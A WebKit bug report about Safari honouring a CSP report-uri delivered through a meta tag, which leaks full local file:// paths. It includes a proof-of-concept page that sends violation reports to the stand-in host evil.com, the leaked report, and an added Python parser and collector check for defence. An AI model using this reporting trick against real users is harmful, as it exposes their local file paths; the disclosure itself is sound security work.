Bug 158263
| Field | Value |
|---|---|
| Summary | CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri |
| Product | WebKit |
| Component | WebCore Misc. |
| Status | RESOLVED DUPLICATE |
| Severity | Normal |
| Priority | P2 |
| Version | WebKit Local Build |
| Hardware | Unspecified |
| OS | OS X 10.11 |
| Reporter | Michele Spagnuolo <mikispag> |
| Assignee | Nobody <webkit-unassigned> |
| CC | aaj+webkit, bfulgham, dbates |
Michele Spagnuolo
Safari leaks the full file:// path in document-uri if a report-uri is present in a CSP served via a <meta> tag, even though the specification explicitly prohibits honoring report-uri when the policy is served via a <meta> tag [1].
PoC:
report-uri.html:

```html
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
<title>CSP report-uri demo</title>
</head>
<body>
<img src="cat.jpg" alt="A nice cat">
</body>
</html>
```
This is the report sent to a remote report-uri:
```json
{
  "csp-report": {
    "document-uri": "file:///Users/mikispag/CSP/report-uri.html",
    "referrer": "",
    "violated-directive": "img-src 'none'",
    "original-policy": "img-src 'none'; report-uri https://evil.com/csp",
    "blocked-uri": "file"
  }
}
```
[1] https://www.w3.org/TR/CSP2/#directive-report-uri
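As an added example (not part of the bug report or of WebKit's code), a small Python policy parser that applies the CSP2 rule the report cites, dropping report-uri, frame-ancestors and sandbox from a <meta>-delivered policy, plus a collector-side check that flags a report whose document-uri carries a non-network scheme such as file://. The PoC page and the report values are the ones quoted above; function names are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Directives CSP2 (section 3.1.3) does not support in a <meta>-delivered policy.
META_UNSUPPORTED = {"report-uri", "frame-ancestors", "sandbox"}

# Sample input: the PoC page and the report quoted in the bug, embedded inline.
POC_HTML = """<!DOCTYPE html><html><head>
<meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
<title>CSP report-uri demo</title></head>
<body><img src="cat.jpg" alt="A nice cat"></body></html>"""
LEAKED_REPORT = {"csp-report": {"document-uri": "file:///Users/mikispag/CSP/report-uri.html",
                                "violated-directive": "img-src 'none'", "blocked-uri": "file"}}

def parse_policy(policy, via_meta):
    """Split a serialized policy into {directive: [values]}. For a <meta>-delivered
    policy the unsupported directives are dropped, so report-uri is never honoured
    (the behaviour the bug says Safari gets wrong)."""
    directives = {}
    for token in policy.split(";"):
        parts = token.strip().split()
        if not parts:
            continue
        name, values = parts[0].lower(), parts[1:]
        if via_meta and name in META_UNSUPPORTED:
            continue
        directives.setdefault(name, values)  # CSP2: first occurrence of a directive wins
    return directives

class _MetaCSP(HTMLParser):
    """Collect the content of every <meta http-equiv="Content-Security-Policy"> tag."""
    def __init__(self):
        super().__init__()
        self.policies = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "content-security-policy":
            self.policies.append(a.get("content") or "")

def meta_policies(html):
    """Return the effective (meta-filtered) policies declared in a document."""
    p = _MetaCSP()
    p.feed(html)
    return [parse_policy(pol, via_meta=True) for pol in p.policies]

def report_leaks_local_path(report):
    """Collector-side check: a document-uri with a non-http(s) scheme (file:// here)
    means the client sent a report it should not have, exposing a local path."""
    scheme = urlsplit(report.get("csp-report", {}).get("document-uri", "")).scheme
    return bool(scheme) and scheme not in ("http", "https")
```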
Daniel Bates
*** This bug has been marked as a duplicate of bug 154307 ***
Daniel Bates
Out of curiosity, what version of Safari are you using? You can find the version of Safari in Safari > About Safari.